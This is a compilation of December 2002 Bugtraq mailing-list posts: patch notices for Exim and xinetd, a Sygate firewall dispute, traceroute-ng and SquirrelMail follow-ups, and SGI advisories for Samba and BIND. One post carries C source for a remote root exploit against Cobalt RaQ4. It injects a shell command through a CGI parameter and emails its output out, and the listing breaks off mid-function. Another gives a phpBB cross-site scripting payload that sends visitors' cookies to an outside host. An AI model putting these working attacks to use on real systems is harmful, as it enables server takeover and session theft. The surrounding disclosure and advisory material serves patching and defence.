Re: Local root vulnerability found in exim 4.x (and 3.x)
[Bugtraq moderator: Please approve this post rather than my previous one. The archive link in that post munges the patches. Thanks] On Wed, Dec 04, 2002 at 04:40:29PM +0100, Wana Thomas <[EMAIL PROTECTED]> is thought to have said: > Solution > > > Exim developers have been informed and a patch will be > ready shortly. Philip Hazel, the author of Exim, released patches for 4.10 and 3.36 on the exim-users list earlier today. Further details on the vulnerability and the patches for both versions can be found in the list archives below: http://www.exim.org/pipermail/exim-users/Week-of-Mon-20021202/046978.html -- Tabor J. Wells [EMAIL PROTECTED] Fsck It! Just another victim of the ambient morality
Re: Local root vulnerability found in exim 4.x (and 3.x)
On Wed, Dec 04, 2002 at 04:40:29PM +0100, Wana Thomas <[EMAIL PROTECTED]> is thought to have said: > Solution > > > Exim developers have been informed and a patch will be > ready shortly. Philip Hazel, the author of Exim, released patches for 4.10 and 3.36 on the exim-users list earlier today. Further details on the vulnerability and the patches for both versions can be found in the list archives below: http://groups.yahoo.com/group/exim-users/message/42358 -- Tabor J. Wells [EMAIL PROTECTED] Fsck It! Just another victim of the ambient morality
RE: Sygate Personal Firewall can be shut down without a need to supply
Hello Seth, Thanks for taking the time to comment about this issue. 1. As you may noticed, I used the term "privileged users". Stopping service is enabled for the members of the local power users as well, so the problem range is wider. 2. I will sharpen my point: You are absolutely correct about the fact that local admins can stop services. If you will see in my note, I wrote: " Privileged users CAN START the procedure of stopping the service - BUT, the application vendor CAN (as part of the overall procedures performed when an application is being shut down) place a code section that forces a password prompt at the beginning of the stopping process and if the password is wrong - to stop the stopping process. " I ask you this: Do you claim that what I wrote is technically wrong and it can't be done by sygate? If this is the claim and it is technically true (I'm not a developer, but a system admin) - I redraw my claims and ask for your forgiveness. If you are not able to claim this - then Sygate has just overlooked this problem and didn't close this breach. 3. Let's be accurate here: YOU added, in your email, the words "non-administrator". I never claimed the "password for exit" is meant only for "non-administrator" users. Neither did Sygate!!!- I have seen the help for the product on your web site - and the password feature was not even mentioned by text or in the screen shot of the "general" tab!!! Probably the help pages was not so updated... A false sense of security is certainly a vulnerability. )The above section of the email was written before re-visiting the help web pages of the product. The following section was written after a re-visit) NOW, I have just re-visited the help pages and I must say I'm shocked!!! Just a day or two ago I visited the web help for the product and the section describing the "general" tab showed a screen shot of an earlier version of the product and the whole "password protection" section was missing from the picture!!! And of course there was no explanation about this feature!!! When I entered NOW to the same page ( http://soho.sygate.com/support/documents/spf_help/general_tab.htm ) - Suddenly the screen shot is showing the "password protection" feature and there is even an explanation to the feature. But that's not all - here comes the best: The screen shot shows that the "ask password while exiting" is dimmed and can't be chosen and the password description is not explaining about this check box at all!!! Beside the fact that this is not the actual current application behavior but only a specially crafted form - what you are doing by this is arrogantly covering your blame!!! I can't express my absolute rejection feelings towards this act! Security is first of all credibility - and as far as my concern: You just lost it! Eitan Caspi Israel -Original Message- From: Seth Knox [mailto:[EMAIL PROTECTED]] Sent: Thursday, December 05, 2002 8:14 PM To: '[EMAIL PROTECTED]' Cc: '[EMAIL PROTECTED]' Subject: Sygate Personal Firewall can be shut down without a need to supply If you are an Administrator of a computer, you have the absolute right to stop any service, including the Sygate Personal Firewall Service, using the services window or "net stop" command. This is not a vulnerability but rather the intended implementation of the Microsoft operating system. If the administrator of the computer wants to prevent other users from stopping the Sygate Personal Firewall Service, they should not grant that right to other users. As you mentioned in your email, Sygate Personal Firewall has the option to prevent any non-administrator from exiting the firewall or stopping the application from the task menu without a password. In enterprise and government organizations, Sygate Secure Enterprise initiates a challenge/response enforcement protocol that ensures that Sygate Security Agent, as well as third-party applications, are running and up-to-date before any system can connect to the network. Seth Knox Product Manager Sygate Technologies
Sygate Personal Firewall can be shut down without a need to supply
If you are an Administrator of a computer, you have the absolute right to stop any service, including the Sygate Personal Firewall Service, using the services window or "net stop" command. This is not a vulnerability but rather the intended implementation of the Microsoft operating system. If the administrator of the computer wants to prevent other users from stopping the Sygate Personal Firewall Service, they should not grant that right to other users. As you mentioned in your email, Sygate Personal Firewall has the option to prevent any non-administrator from exiting the firewall or stopping the application from the task menu without a password. In enterprise and government organizations, Sygate Secure Enterprise initiates a challenge/response enforcement protocol that ensures that Sygate Security Agent, as well as third-party applications, are running and up-to-date before any system can connect to the network. Seth Knox Product Manager Sygate Technologies -- Forwarded message -- Date: Wed, 4 Dec 2002 22:59:12 +0200 From: Eitan Caspi <[EMAIL PROTECTED]> To: [EMAIL PROTECTED] Subject: Sygate Personal Firewall can be shut down without a need to supply a password - although one is required Tested and affected software: Sygate Personal Firewall 5.0 build 1150s (The free version) installed on Windows XP Pro with SP1 Summary: Sygate personal firewall has an option to ask for a password before entering various sections of the application or making some actions (like moving between protection levels (block all / allow all / normal)). It also has the option to force entering the same password for anyone wishing to exit the Firewall. This password is not asked for (i.e. no password prompt is showing) when any local or remote user that have the right to stop services (e.g. member of the local "Administrators" and "Power Users" groups) is stopping the "Sygate Personal Firewall" service on the target machine. The service simply stops completely and silently - and thus closes the firewall completely and leaves the machine without FW and / or IDS protection. It is true that highly privileged users have the ability to fully control any machine they are privileged on - but there may be situations where a machine will have several privileged users but only one will be assigned to control the machine's FW (e.g. a developer and a system administrator). Privileged users CAN START the procedure of stopping the service - BUT, the application vendor CAN (as part of the overall procedures performed when an application is being shut down) place a code section that forces a password prompt at the beginning of the stopping process and if the password is wrong - to stop the stopping process. Reproduction: WARNING: For Maximum security - disconnect from the Internet and / or any other possibly hostile networks BEFORE performing this steps, since this steps will cause your machine to be un-protected from any networked hostile activity !!! A. Preparation 1. Log on to the machine (Windows XP Pro with SP1) as a local administrator 2. Make sure you have Sygate Personal Firewall 5.0 build 1150s installed and running 3. Open Sygate Personal Firewall (Following SPF) main interface 4. Choose the command "Options..." from the "Tools" menu 5. Click the "Set Password..." button in the "General" tab 6. Enter the new password as asked for. Click the "OK" button 7. Check the "Ask password while existing" check box 8. Click the "OK" button of the whole "Options" form 9. Close SPF main interface B. Current stoppage protection measures that are working properly: 1. If you try, as a local administrator, to kill smc.exe (SPF service executable) from the "task manager" - it won't be killed. If you are running XP in a "Fast User Switching" mode there may be two (or more) instances of smc.exe: one that runs under user name of "system" which is the one loaded by the service - this one will not be killed. The other one will run under the user name of a logged on user and this one CAN be killed (i.e. the task bar icon will be gone and so is the GUI application, but the service (as noted above) will still run and protect the machine). 2. If you try, as a local administrator to kill smc.exe from the command line using the win2k resource kit tool "kill.exe" - it won't be killed. When running "kill.exe" in a command prompt (cmd.exe) the command will return a message that the process was killed, but checking the list of processes in the processes tab at the "task manager" will show that "smc.exe" is still running. C. Testing the basic "Ask password while existing" feature: 1. Try to exit SPF by doing a right mouse click on the SPF icon on the task bar and choosing "Exit Firewall" 2. A prompt for a password appears 3. Enter the password and click "OK" 4. Click "Yes" at the warning dialog box 5. SPF will exit and its icon will be gone D. Vulnerability Reproduction =A0 1. Start SPF by
Re: [Fwd: [RHSA-2002:196-09] Updated xinetd packages fix denial ofservice vulnerability]
On 4 Dec 2002, Dan Rowles wrote: > On October 15th, Redhat sent a post to BugTraq advising users of Xinetd > to upgrade to 2.3.9-0.xx > > Their latest post (3rd December) advises people to "upgrade" to > 2.3.7-4.xx > > Can anyone from RedHat please comment on what people who have already > got 2.3.9 installed should do from here? Do we need to force a > downgrade, or is 2.3.9 OK? If so, why the second update, and why has the > 2.3.9 RPM disappeared from the mirrors? I'm not from Red Hat, but I can answer your questions. This confused me, too, until I did some digging in Red Hat's bugzilla. Red Hat is using the "epoch" field in the RPM metadata to allow you to automatically "upgrade" (or freshen) from 2.3.9 (epoch 1) back to 2.3.7 (epoch 2). They rolled back to 2.3.7 because 2.3.9 was leaving stale TCP connections in the CLOSE_WAIT state, according to their bugzilla database: http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=76146 for more info. Ryan Cleary SysAdmin Interdimenions Corp. -- T Ryan Cleary <[EMAIL PROTECTED]> URL: http://people.interdimensions.com/tryanc PGP: 82 93 32 D7 3A AC C0 8D 34 56 96 CC DA DB 5E 2B
Re: TracerouteNG - never ending story
> Hi everyone, Hi. > I want to provide some additional information about the recently > discovered traceroute-ng flaw. I decided to disclose to details right > now because I do not believe that the flaw is easily exploitable. > > > 1) The vulnerablilty. > > The patch provided by vendors like SuSE is not sufficient. It only > closed one of at least 3 different holes. Ok, let's see... > Hole #1 : (closed in the recent patch) > -- As you already said: It's fixed. thomas@Wintermute:~> /usr/sbin/traceroute -P -q 1 -n $(perl -e 'print"0"x13000')127.0.0.1 traceroute to 000 (87.0.0.1), 30 hops max, 40 byte packets 1 172.16.0.1 1 ms 2 145.253.1.203 21 ms 3 145.253.16.65 29 ms 4 145.254.12.13 38 ms 5 145.254.12.53 46 ms thomas@Wintermute:~> > Hole #2 : > - > > (gdb) r -P -q 1 -n -S -99 -m 0 localhost It's fixed now. > Hole #3: > > > Just run with the following arguments: > > (gdb) r -P -q 999 -n localhost Does not seem to work. thomas@Wintermute:~> /usr/sbin/traceroute -P -q 999 -n localhost nprobes must be >0 and <= 256 thomas@Wintermute:~> > So one can overwrite consecutive memory blocks of type > > struct { > u_long dport; /* check for matching dport */ > u_char ttl;/* ttl we sent it to */ > u_char type; /* icmp response type */ > struct timeval out;/* time packet left */ > struct timeval rtn;/* time packet arrived */ > struct sockaddr_in from; /* whom from */ > } spray > > starting at the address of 'spray' (which is again located in the heap) > with the values stored in out, dport, ttl. So far I looked at this, > nothing really sensefull can be overwritten this way. Two candidates are: > > [a] the socket descriptor s, which is later used by FD_SET (instant > memory writer... :-) The only FD_SET() I found: FD_SET(sock, &fds); Socket s occurs here: s = socket(AF_INET, SOCK_RAW, pe->p_proto) // ICMP socket and here: s = socket(hp->h_addrtype, SOCK_STREAM, 0) So, can you be more precise on this? > - (un)fortunately the system time is stored in s by > overflowing the spray array :-) ? > Summary > --- > > The are still vulnerabilities in the traceroute-ng package which may > lead to a local root compromise, depending on the actual OS running on. traceroute-nanog drops root privileges right after allocating the raw ip- and the raw icmp-socket. So, the attacker does not get root privileges. > Anyway, in my opinion the code of traceroute-ng breaks with many > fundamental secure coding practices, it is hard to believe that such > crap has been included on major distributions carrying the suid bit. It uses setuid() and isn't shipped anymore since 8.1. --- And now the things Carl Livitt <[EMAIL PROTECTED]> founds. > while ((n = read(s, buf, sizeof(buf))) > 0) { >strcpy((char *)&reply[count],(char *)buf); >count += n; >} This one is already fixed. > strncpy(tmp4,i,(j-i)); // OVERFLOW > tmp4[j-i] = '\0'; This buffer overflow was already found by Sebastian Krahmer <[EMAIL PROTECTED]>. The fix is included in the upcoming traceroute-nanog security update. Bye, Thomas -- Thomas Biege <[EMAIL PROTECTED]> SuSE Linux AG,Deutschherrnstr. 15-19,90429 Nuernberg Function: Security Support & Auditing "lynx -source http://www.suse.de/~thomas/contact/thomas.asc | pgp -fka" Key fingerprint = 51 AD B9 C7 34 FC F2 54 01 4A 1C D4 66 64 09 83 -- Over thinking, Over analyzing, seperates the body from the mind. - Maynard James Keenan
Cobalt RaQ4 Remote root exploit
Hello, I've attached an exploit that will allow an attacker to gain remote root access on Cobalt RaQ's which have the security hardening package installed (SHP). the official patch for this problem can be found here : http://ftp.cobalt.sun.com/pub/packages/raq4/eng/RaQ4-en-Security-2.0.1-SHP_REM.pkg Wouter ter Maat aka [EMAIL PROTECTED] http://www.i-security.nl // RaQ 4 and possibly others easy remote root compromise // due to a flaw in the Security Hardening package HEHE! // Wouter ter Maat aka grazer - http://www.i-security.nl #include #include #include #include #include #include #include #define PORT 81 /* default cobalt admin httpd try 444 if 81 runs with ssl */ // cmpstr #define found "overflow" #define done "Starting" #define exec "mail" // prototypes int banner(); int makereq(char *host, char *request, char *cmpstr, int port); int main(int argc, char *argv[]) { int retval, port; char cmd[1024]; char cbuf[1024]; char request2[3096]; // evi1 requests char request1[] = "\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x2e" "\x63\x6f\x62\x61\x6c\x74\x2f\x6f\x76\x65\x72\x66\x6c\x6f" "\x77\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77\x2e\x63\x67\x69" "\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\n\x48\x6f\x73" "\x74\x3a\x20\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\n\n\n"; char req_tmp[] = "\x50\x4f\x53\x54\x20\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x2e" "\x63\x6f\x62\x61\x6c\x74\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77" "\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77\x2e\x63\x67\x69\x20\x48" "\x54\x54\x50\x2f\x31\x2e\x31\n\x41\x63\x63\x65\x70\x74\x3a\x20" "\x69\x6d\x61\x67\x65\x2f\x67\x69\x66\x2c\x20\x69\x6d\x61\x67" "\x65\x2f\x78\x2d\x78\x62\x69\x74\x6d\x61\x70\x2c\x20\x69\x6d" "\x61\x67\x65\x2f\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67\x65" "\x2f\x70\x6a\x70\x65\x67\x2c\x20\x2a\x2f\x2a\n\x41\x63\x63" "\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x6e\x6c\n" "\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61" "\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77" "\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64" "\x65\x64\n\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64" "\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c" "\x61\x74\x65\n\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20" "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x3b\x29\n" "\x48\x6f\x73\x74\x3a\x20\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31" "\x3a\x38\x31\n"; char request3[] = "\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x2e\x63" "\x6f\x62\x61\x6c\x74\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77\x2f" "\x6f\x76\x65\x72\x66\x6c\x6f\x77\x54\x65\x73\x74\x45\x6d\x61" "\x69\x6c\x2e\x63\x67\x69\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\n" "\x48\x6f\x73\x74\x3a\x20\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\n\n\n"; sprintf(cmd, "%s%s%s", "enabled=1&email=`", argv[2], "`&page=overflow\n\n"); sprintf(cbuf, "%s %d %s", "Content-Length:", strlen(cmd)-2, "\n\n"); sprintf(request2, "%s%s%s", req_tmp, cbuf, cmd); banner(); while(argc < 3) { fprintf(stderr, " %s\n", argv[0]); fprintf(stderr, " example: www.cobalt.com \"id|mail you@addy\" 444\n"); fprintf(stderr, " default port is set to 81. \n\n"); exit(0); } if(argc==3) { port = PORT; } else { port = atoi(argv[3]); } retval = makereq(argv[1], request1, found, port); if(retval==2) { printf(" - name cannot be resolved!\n"); exit(0); } if(retval==3) { printf(" - connect: connection refused! d0h!\n"); exit(0); } if(retval==404) { printf(" - this machine is not vulnerable, dweep!\n"); exit(0); } else { printf(" + ow yeah, we've found a victim!\n"); } printf(" ++ Enabling stackguard and creating evil config file...\n"); retval = makereq(argv[1], request2, done, port); if(retval==404) { printf(" -- attack failed , sorry! \n"); exit(0);} else { printf(" +++ config file written succesfully ! \n"); } printf(" Let's get our evil command executed...\n"); retval = makereq(argv[1], request3, exec, port); if(retval==404) { printf(" --- attack failed, sorry! \n"); exit(0);} else { printf(" + The command : \"%s\"\n + has been run on the server.\n\n", argv[2]); } } int banner() { printf("*\n"); printf("RaQ 4 remote root exploit - [EMAIL PROTECTED]\n"); printf("Vulnerable : RaQ4 with Security Hardening Update.\n"); printf(" isn't it ironic? :] \n"); printf("*\n"); } int makereq(char *host, char *request, char *cmpstr, int port) { int fd, sock, chk; char buf[2000]; struct sockaddr_in addr; struct hostent *lh; if ((lh=gethostbyname(host)) == NULL){ return 2;
[Fwd: [RHSA-2002:196-09] Updated xinetd packages fix denial ofservice vulnerability]
On October 15th, Redhat sent a post to BugTraq advising users of Xinetd to upgrade to 2.3.9-0.xx Their latest post (3rd December) advises people to "upgrade" to 2.3.7-4.xx Can anyone from RedHat please comment on what people who have already got 2.3.9 installed should do from here? Do we need to force a downgrade, or is 2.3.9 OK? If so, why the second update, and why has the 2.3.9 RPM disappeared from the mirrors? -- Dan Rowles CTO Outcome Technologies _ t: +44 (0)207 656 2460 f: +44 (0)709 230 6588 m: +44 (0)798 076 8143 e: [EMAIL PROTECTED] w: http://www.outcometechnologies.com BUPA House 15-19 Bloomsbury Way London WC1A 2BA _ ***This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you receive this message in error, please return it to the sender.*** --- Begin Message --- - Red Hat, Inc. Red Hat Security Advisory Synopsis: Updated xinetd packages fix denial of service vulnerability Advisory ID: RHSA-2002:196-09 Issue date:2002-09-06 Updated on:2002-10-14 Product: Red Hat Linux Keywords: xinetd file descriptor leak Cross references: Obsoletes: CVE Names: CAN-2002-0871 - 1. Topic: Xinetd contains a denial-of-service (DoS) vulnerability. 2. Relevant releases/architectures: Red Hat Linux 7.0 - alpha, i386 Red Hat Linux 7.1 - alpha, i386, ia64 Red Hat Linux 7.2 - i386, ia64 Red Hat Linux 7.3 - i386 3. Problem description: Xinetd is a secure replacement for inetd, the Internet services daemon. Versions 2.3.4 through 2.3.7 of Xinetd leak file descriptors for the signal pipe to services that are launched by xinetd. This could allow an attacker to execute a DoS attack via the pipe. Red Hat Linux 7.3 shipped with xinetd version 2.3.4 and is therefore vulnerable to this issue. All users are advised to upgrade to the errata packages containing xinetd version 2.3.9 which is not vulnerable to this issue. This issue was discovered by Solar Designer. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. To update all RPMs for your particular architecture, run: rpm -Fvh [filenames] where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs. Please note that this update is also available via Red Hat Network. Many people find this an easier way to apply updates. To use Red Hat Network, launch the Red Hat Update Agent with the following command: up2date This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. 5. RPMs required: Red Hat Linux 7.0: SRPMS: ftp://updates.redhat.com/7.0/en/os/SRPMS/xinetd-2.3.9-0.70.src.rpm alpha: ftp://updates.redhat.com/7.0/en/os/alpha/xinetd-2.3.9-0.70.alpha.rpm i386: ftp://updates.redhat.com/7.0/en/os/i386/xinetd-2.3.9-0.70.i386.rpm Red Hat Linux 7.1: SRPMS: ftp://updates.redhat.com/7.1/en/os/SRPMS/xinetd-2.3.9-0.71.src.rpm alpha: ftp://updates.redhat.com/7.1/en/os/alpha/xinetd-2.3.9-0.71.alpha.rpm i386: ftp://updates.redhat.com/7.1/en/os/i386/xinetd-2.3.9-0.71.i386.rpm ia64: ftp://updates.redhat.com/7.1/en/os/ia64/xinetd-2.3.9-0.71.ia64.rpm Red Hat Linux 7.2: SRPMS: ftp://updates.redhat.com/7.2/en/os/SRPMS/xinetd-2.3.9-0.72.src.rpm i386: ftp://updates.redhat.com/7.2/en/os/i386/xinetd-2.3.9-0.72.i386.rpm ia64: ftp://updates.redhat.com/7.2/en/os/ia64/xinetd-2.3.9-0.72.ia64.rpm Red Hat Linux 7.3: SRPMS: ftp://updates.redhat.com/7.3/en/os/SRPMS/xinetd-2.3.9-0.73.src.rpm i386: ftp://updates.redhat.com/7.3/en/os/i386/xinetd-2.3.9-0.73.i386.rpm 6. Verification: MD5 sum Package Name -- 8c6ac9eda0398dcd94bca0381ac03026 7.0/en/os/SRPMS/xinetd-2.3.9-0.70.src.rpm eba55ee2c7f1008f216a520044ccb15d 7.0/en/os/alpha/xinetd-2.3.9-0.70.alpha.rpm 68c73e5047b4038147cc93db1d2a3585 7.0/en/os/i386/xinetd-2.3.9-0.70.i386.rpm 621d5914e49a9ad6b61fc185c194de62 7.1/en/os/SRPMS/xinetd-2.3.9-0.71.src.rpm 36b905178ce4485f17a5bf5851f4f867 7.1/en/os/alpha/xinetd-2.3.9-0.71.alpha.rpm c8b4f5b662351972f1502c929154925c 7.1/en/os/i386/xinetd-2.3.9-0.71.i386.rpm e26bdae93d1adcb72bb73c5e9d79d3f0 7.1/en/os/ia64/xinetd-2.3.9-0.71.ia64.rpm a3e5cbc60ca4ca0c5396d77e179adef5 7.2/en/os/SRPMS/xinetd-2.3.9-0.72.src.rpm f1bc1eefa580f873011821d0b50da5d6 7.2/en/os/i386/xinetd-2.3.9-0.72.i386.rpm 3051f3f4b9b6df880e3e8bc101fa36b9 7.2/en/os/ia64
Re: SquirrelMail v1.2.9 XSS bugs
Hello Euronymous, On Monday, December 02, 2002, euronymous wrote... > topic: SquirrelMail v1.2.9 XSS bugs > product: SquirrelMail v1.2.9 > vendor: www.squirrelmail.org > risk: low > date: 12/3/2k2 > discovered by: euronymous /F0KP /HACKRU Team > advisory url: http://f0kp.iplus.ru/bz/008.txt > =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= > description > --- > when reading some email you can to insert the scripting code.. > read_body.php dont make filtering users input in `mailbox' and > `passed_id' variables. btw, today has released v1.2.10. im dont > know if this version contains this xss. > [snip] Thank you for pointing this out. We would have been a lot more grateful if you had notified us of this issue prior to releasing the bugtraq posting, and it would have been fixed in our 1.2.10 release, which as you pointed out was released just yesterday. The lack of forward notification is frustrating, and it would have been nice to have heard earlier. Next time any issues such as this arise, please feel free to contact the project administrators/leaders (such as myself), which can all be found listed on http://www.squirrelmail.org/about.php. -- Jonathan Angliss ([EMAIL PROTECTED])
Cross-site Scripting Vulnerability in phpBB 2.0.3
Hello :) here is the code http://target/search.php?mode=searchuser";> search.search_username.value='Http://savecookie/x.php?Cookie=";>'; document.search.submit(); work for me using, IE 6 sp 1 (xp) maybe you can do this in a better way but, this example work realy fine the problem is search.php when show search_username u can put anything with a few restrictions solution: 1 Don't show the last entry or something like that 2 filter the code :p Bye _ Do You Yahoo!? Información de Estados Unidos y América Latina, en Yahoo! Noticias. Visítanos en http://noticias.espanol.yahoo.com
Samba Security Vulnerability on IRIX
-BEGIN PGP SIGNED MESSAGE- __ SGI Security Advisory Title: Samba Security Vulnerability Number : 20021204-01-I Date : December 5, 2002 Reference: CVE CAN-2002-1318 Reference: SGI BUG 874162 Fixed in : Samba v2.2.7 __ - --- - --- Issue Specifics --- - --- It's been reported that versions of Samba prior to 2.2.7 have a security vulnerability that could potentially allow an attacker to gain root access on the target machine. The word "potentially" is used because there is no known exploit of this bug. SGI has not found one, nor has the Samba group found one. Nevertheless, the vulnerability is considered serious. See http://www.samba.org/samba/whatsnew/samba-2.2.7.html for additional details. This vulnerability was assigned the following CVE candidate: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1318 SGI has investigated the issue and recommends the following steps for neutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be implemented on ALL vulnerable SGI systems. These issues have been corrected in Samba version 2.2.7. - -- - --- Impact --- - -- Samba is an optional product, and is not installed by default on IRIX 6.5 systems. To determine the version of IRIX you are running, execute the following command: # /bin/uname -R That will return a result similar to the following: # 6.5 6.5.16f The first number ("6.5") is the release name, the second ("6.5.16f" in this case) is the extended release name. The extended release name is the "version" we refer to throughout this document. To see if samba is installed, execute the following command: % versions samba_irix I = Installed, R = Removed Name DateDescription I samba_irix 07/02/2002 Samba 2.2.4 for IRIX I samba_irix.man 07/02/2002 Samba Online Documentation I samba_irix.man.doc 07/02/2002 Samba 2.2.4 Documentation I samba_irix.man.manpages 07/02/2002 Samba 2.2.4 Man Page I samba_irix.man.relnotes 07/02/2002 Samba 2.2.4 Release Notes I samba_irix.src 07/02/2002 Samba Source Code I samba_irix.src.samba 07/02/2002 Samba 2.2.4 Source Code I samba_irix.sw07/02/2002 Samba Execution Environment I samba_irix.sw.base 07/02/2002 Samba 2.2.4 Execution Environment If the result is similar to the above and the version shown is less than 2.2.7, then the system is vulnerable. - - --- Temporary Workaround --- - There is no effective workaround available for these problems if Samba is required. SGI recommends upgrading to Samba version 2.2.7. - - --- Solution --- - SGI has provided an instable version of Samba for this vulnerability. Our recommendation is to upgrade to Samba version 2.2.7. Samba 2.2.7 can be downloaded from http://www.samba.org/ or http://freeware.sgi.com/ For customers who have purchased the SGI supported version of Samba, please contact your SGI Support Representative and request part number 812-0893-008 -- Samba 2.2.7 for IRIX on CD. OS Version Vulnerable? Patch # Other Actions -- --- --- - IRIX 3.xunknown Note 1 IRIX 4.xunknown Note 1 IRIX 5.xunknown Note 1 IRIX 6.0.x unknown Note 1 IRIX 6.1unknown Note 1 IRIX 6.2unknown Note 1 IRIX 6.3unknown Note 1 IRIX 6.4unknown Note 1 IRIX 6.5 yes Notes 2 & 3 IRIX 6.5.1yes Notes 2 & 3 IRIX 6.5.2yes Notes 2 & 3 IRIX 6.5.3yes Notes 2 & 3 IRIX 6.5.4yes Notes 2 & 3 IRIX 6.5.5yes Notes 2 & 3 IRIX 6.5.6yes Notes 2 & 3 IRIX 6.5.7yes Notes 2 & 3 IRIX 6.5.8yes Notes 2 & 3 IRIX 6.5.9yes Notes 2 & 3 IRIX 6.5.10 yes Notes 2 & 3 IRIX 6.5.11 yes Notes 2 & 3 IRIX 6.5.12 yes Notes 2 & 3 IRIX 6.5.13 yes Notes 2 & 3 IRIX 6.5.14 yes Notes 2 & 3 IRIX 6.5.15 yes Notes 2 & 3 IRIX 6.5.16 yes Notes 2 & 3 IRIX 6.5.17 yes Notes 2 & 3 IRIX 6.5.18
BIND Name Server DNS Spoofing Vulnerability on IRIX
-BEGIN PGP SIGNED MESSAGE- __ SGI Security Advisory Title: BIND Name Server DNS Spoofing Vulnerability Number : 20021203-01-A Date : December 5, 2002 Reference: CERT Vulnerability Note VU#457875 Reference: SGI BUG 874059 __ - --- - --- Issue Specifics --- - --- SGI acknowledges the BIND name server vulnerability reported by Vagner Sacramento in CERT VU# 457875 (http://www.kb.cert.org/vuls/id/457875 and http://www.rnp.br/cais/alertas/2002/cais-ALR-19112002a.html) and is currently investigating. No further information is available at this time. For the protection of all our customers, SGI does not disclose, discuss or confirm vulnerabilities until a full investigation has occurred and any necessary patch(es) or release streams are available for all vulnerable and supported Linux and IRIX operating systems. Until SGI has more definitive information to provide, customers are encouraged to assume all security vulnerabilities as exploitable and take appropriate steps according to local site security policies and requirements. As further information becomes available, additional advisories will be issued via the normal SGI security information distribution methods including the wiretap mailing list. - - --- Acknowledgments - SGI wishes to thank Vagner Sacramento, CERT, and the users of the Internet Community at large for their assistance in this matter. - -- - --- Links - -- SGI Security Advisories can be found at: http://www.sgi.com/support/security/ and ftp://patches.sgi.com/support/free/security/advisories/ SGI Security Patches can be found at: http://www.sgi.com/support/security/ and ftp://patches.sgi.com/support/free/security/patches/ SGI patches for IRIX can be found at the following patch servers: http://support.sgi.com/irix/ and ftp://patches.sgi.com/ SGI freeware updates for IRIX can be found at: http://freeware.sgi.com/ SGI fixes for SGI open sourced code can be found on: http://oss.sgi.com/projects/ SGI patches and RPMs for Linux can be found at: http://support.sgi.com/linux/ or http://oss.sgi.com/projects/sgilinux-combined/download/security-fixes/ SGI patches for Windows NT or 2000 can be found at: http://support.sgi.com/nt/ IRIX 5.2-6.4 Recommended/Required Patch Sets can be found at: http://support.sgi.com/irix/ and ftp://patches.sgi.com/support/patchset/ IRIX 6.5 Maintenance Release Streams can be found at: http://support.sgi.com/colls/patches/tools/relstream/index.html IRIX 6.5 Software Update CDs can be obtained from: http://support.sgi.com/irix/swupdates/ The primary SGI anonymous FTP site for security advisories and patches is patches.sgi.com (216.32.174.211). Security advisories and patches are located under the URL ftp://patches.sgi.com/support/free/security/ For security and patch management reasons, ftp.sgi.com (mirrors patches.sgi.com security FTP repository) lags behind and does not do a real-time update. - - - --- SGI Security Information/Contacts --- - - If there are questions about this document, email can be sent to [EMAIL PROTECTED] --oOo-- SGI provides security information and patches for use by the entire SGI community. This information is freely available to any person needing the information and is available via anonymous FTP and the Web. The primary SGI anonymous FTP site for security advisories and patches is patches.sgi.com (216.32.174.211). Security advisories and patches are located under the URL ftp://patches.sgi.com/support/free/security/ The SGI Security Headquarters Web page is accessible at the URL: http://www.sgi.com/support/security/ For issues with the patches on the FTP sites, email can be sent to [EMAIL PROTECTED] For assistance obtaining or working with security patches, please contact your SGI support provider. --oOo-- SGI provides a free security mailing list service called wiretap and encourages interested parties to self-subscribe to receive (via email) all SGI Security Advisories when they are released. Subscribing to the mailing list can be done via the Web (http://www.sgi.com/support/security/wiretap.html) or by sending email to SGI as outlined below. % mail [EMAIL PROTECTED] subscribe wiretap end ^d In the example above, is the email address that you wish the mailing list information sent to. The word end must be on a separate line to indicate the end of the body of the message. The control-d (^d) is used to indicate to the mail program that you are finished composing the mail message. --oOo-- SGI provides a comprehensive custome
Proxy vulnerability in TrendMicro InterScan-VirusWall V3.6
